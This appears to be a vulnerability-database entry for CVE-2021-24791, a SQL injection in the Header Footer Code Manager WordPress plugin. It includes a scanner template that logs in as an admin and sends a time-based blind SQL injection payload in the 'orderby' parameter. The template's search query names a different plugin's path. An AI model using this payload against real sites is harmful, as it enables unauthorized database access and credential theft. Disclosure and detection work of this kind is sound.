CVE-2021-24791: Header Footer Code Manager < 1.1.14 - Admin+ SQL Injection

2025-08-01 Header Footer Code Manager PoC Public

Description

The Header Footer Code Manager WordPress plugin before 1.1.14 does not validate and escape the "orderby" and "order" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections

PoC

id: CVE-2021-24791

info:
  name: Header Footer Code Manager < 1.1.14 - Admin+ SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    The Header Footer Code Manager WordPress plugin before 1.1.14 does not validate and escape the "orderby" and "order" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections
  impact: |
    Authenticated administrators can exploit time-based blind SQL injection in the Snippets dashboard, potentially extracting sensitive database contents including user credentials.
  remediation: Fixed in version 1.1.14
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24791
    - https://wpscan.com/vulnerability/d55caa9b-d50f-4c13-bc69-dc475641735f
    - https://wordpress.org/plugins/header-footer-code-manager/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2021-24791
    cwe-id: CWE-89
    epss-score: 0.05208
    epss-percentile: 0.92068
    cpe: cpe:2.3:a:draftpress:header_footer_code_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: draftpress
    product: header_footer_code_manager
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/wp-custom-pages/"
  tags: time-based-sqli,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager,draftpress,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        @timeout: 20s
        GET /wp-admin/admin.php?page=hfcm-list&orderby=%28SELECT+5619+FROM+%28SELECT%28SLEEP%286%29%29%29uWCv%29&order=DESC HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2,"Add New Snippet")'
        condition: and
# digest: 4a0a00473045022100a90b26fb293c311dcf7d77c435c14bd18952a588afee5743d42e8db0c107c14a02203d0aa15d9078c4541ce81f316d36bbcbdff39b5b4c749acfd7562874dc9e05c2:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities